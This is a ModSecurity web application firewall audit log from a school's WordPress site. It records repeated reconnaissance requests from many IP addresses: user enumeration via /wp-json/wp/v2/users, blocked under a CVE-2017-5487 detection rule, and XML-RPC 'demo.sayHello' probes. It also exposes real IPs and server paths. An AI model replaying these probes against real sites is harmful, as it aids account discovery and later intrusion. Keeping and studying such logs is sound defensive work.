1746840899198762 5087; combined=4025, p1=471, p2=3343, p3=28, p4=30, p5=89, sr=68, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a37dbf7d-Z-- --9152392e-A-- [10/May/2025:08:35:03 +0700] aB6tR6uC4AqLGUOyzyX72wAAAI0 103.236.140.4 53774 103.236.140.4 8181 --9152392e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9152392e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9152392e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840903592189 2805 (- - -) Stopwatch2: 1746840903592189 2805; combined=1288, p1=435, p2=823, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9152392e-Z-- --2d7b0874-A-- [10/May/2025:08:35:11 +0700] aB6tTxLuBiaF9R054QBbAwAAAAk 103.236.140.4 53780 103.236.140.4 8181 --2d7b0874-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2d7b0874-C-- demo.sayHello --2d7b0874-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d7b0874-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840911345429 6918 (- - -) Stopwatch2: 1746840911345429 6918; combined=4922, p1=626, p2=4035, p3=42, p4=43, p5=103, sr=90, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d7b0874-Z-- --0cf08e68-A-- [10/May/2025:08:35:20 +0700] aB6tWBLuBiaF9R054QBbBAAAAAg 103.236.140.4 53784 103.236.140.4 8181 --0cf08e68-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0cf08e68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cf08e68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840920760274 3296 (- - -) Stopwatch2: 1746840920760274 3296; combined=1467, p1=481, p2=898, p3=0, p4=0, p5=88, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cf08e68-Z-- --e2e70d62-A-- [10/May/2025:08:35:29 +0700] aB6tYRLuBiaF9R054QBbBgAAAAo 103.236.140.4 53790 103.236.140.4 8181 --e2e70d62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.241 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e2e70d62-C-- demo.sayHello --e2e70d62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2e70d62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840929624335 5616 (- - -) Stopwatch2: 1746840929624335 5616; combined=4240, p1=528, p2=3497, p3=29, p4=31, p5=91, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2e70d62-Z-- --3e907d1f-A-- [10/May/2025:08:35:44 +0700] aB6tcNr9PbfRBMhzxmRazwAAAFY 103.236.140.4 53800 103.236.140.4 8181 --3e907d1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3e907d1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e907d1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840944845458 2792 (- - -) Stopwatch2: 1746840944845458 2792; combined=1247, p1=429, p2=788, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e907d1f-Z-- --a6aabd0e-A-- [10/May/2025:08:35:57 +0700] aB6tfdr9PbfRBMhzxmRa0QAAAFc 103.236.140.4 53808 103.236.140.4 8181 --a6aabd0e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a6aabd0e-C-- demo.sayHello --a6aabd0e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6aabd0e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840957692809 5946 (- - -) Stopwatch2: 1746840957692809 5946; combined=4330, p1=602, p2=3450, p3=30, p4=84, p5=96, sr=122, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6aabd0e-Z-- --01259373-A-- [10/May/2025:08:36:01 +0700] aB6tgRLuBiaF9R054QBbCgAAABM 103.236.140.4 53810 103.236.140.4 8181 --01259373-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --01259373-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01259373-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840961629806 2976 (- - -) Stopwatch2: 1746840961629806 2976; combined=1335, p1=530, p2=780, p3=0, p4=0, p5=25, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01259373-Z-- --366a7132-A-- [10/May/2025:08:36:07 +0700] aB6th9r9PbfRBMhzxmRa1AAAAEA 103.236.140.4 53816 103.236.140.4 8181 --366a7132-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --366a7132-C-- demo.sayHello --366a7132-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --366a7132-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840967711824 4462 (- - -) Stopwatch2: 1746840967711824 4462; combined=3532, p1=466, p2=2871, p3=22, p4=23, p5=88, sr=110, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --366a7132-Z-- --e1c82563-A-- [10/May/2025:08:36:51 +0700] aB6ts9r9PbfRBMhzxmRa1gAAAEE 103.236.140.4 53820 103.236.140.4 8181 --e1c82563-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e1c82563-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1c82563-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746841011889538 3088 (- - -) Stopwatch2: 1746841011889538 3088; combined=1330, p1=487, p2=813, p3=0, p4=0, p5=29, sr=124, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1c82563-Z-- --86a46460-A-- [10/May/2025:08:37:00 +0700] aB6tvNr9PbfRBMhzxmRa2AAAAEU 103.236.140.4 53824 103.236.140.4 8181 --86a46460-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86a46460-C-- demo.sayHello --86a46460-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86a46460-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746841020992568 4932 (- - -) Stopwatch2: 1746841020992568 4932; combined=3872, p1=438, p2=3214, p3=31, p4=35, p5=91, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86a46460-Z-- --61342a57-A-- [10/May/2025:08:42:01 +0700] aB6u6ci6w7GTj2w44Z6cKAAAANQ 103.236.140.4 53854 103.236.140.4 8181 --61342a57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --61342a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61342a57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746841321797486 3259 (- - -) Stopwatch2: 1746841321797486 3259; combined=1387, p1=471, p2=884, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61342a57-Z-- --d4d4117e-A-- [10/May/2025:08:42:06 +0700] aB6u7hLuBiaF9R054QBbDwAAAAU 103.236.140.4 53858 103.236.140.4 8181 --d4d4117e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.140 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d4d4117e-C-- demo.sayHello --d4d4117e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4d4117e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746841326526155 5545 (- - -) Stopwatch2: 1746841326526155 5545; combined=4129, p1=537, p2=3342, p3=28, p4=32, p5=124, sr=71, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4d4117e-Z-- --064c6079-A-- [10/May/2025:08:42:44 +0700] aB6vFBLuBiaF9R054QBbEgAAAAg 103.236.140.4 53868 103.236.140.4 8181 --064c6079-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --064c6079-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --064c6079-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746841364981998 2835 (- - -) Stopwatch2: 1746841364981998 2835; combined=1418, p1=489, p2=898, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --064c6079-Z-- --b0cc8b18-A-- [10/May/2025:08:42:51 +0700] aB6vG8i6w7GTj2w44Z6cKgAAAMQ 103.236.140.4 53872 103.236.140.4 8181 --b0cc8b18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.118 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b0cc8b18-C-- demo.sayHello --b0cc8b18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0cc8b18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746841371838275 5869 (- - -) Stopwatch2: 1746841371838275 5869; combined=4322, p1=499, p2=3597, p3=28, p4=32, p5=97, sr=72, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0cc8b18-Z-- --06abd420-A-- [10/May/2025:08:49:17 +0700] aB6wnRLuBiaF9R054QBbFgAAAA0 103.236.140.4 53902 103.236.140.4 8181 --06abd420-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.79.248.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.79.248.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --06abd420-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06abd420-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746841757966728 3501 (- - -) Stopwatch2: 1746841757966728 3501; combined=1435, p1=492, p2=910, p3=0, p4=0, p5=33, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06abd420-Z-- --cd5ddc3a-A-- [10/May/2025:08:57:24 +0700] aB6yhBLuBiaF9R054QBbHQAAAAM 103.236.140.4 53964 103.236.140.4 8181 --cd5ddc3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 162.214.169.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.214.169.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cd5ddc3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd5ddc3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746842244923688 2894 (- - -) Stopwatch2: 1746842244923688 2894; combined=1309, p1=433, p2=848, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd5ddc3a-Z-- --a650e279-A-- [10/May/2025:09:08:11 +0700] aB61C9r9PbfRBMhzxmRa5QAAAEg 103.236.140.4 54038 103.236.140.4 8181 --a650e279-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a650e279-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a650e279-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] 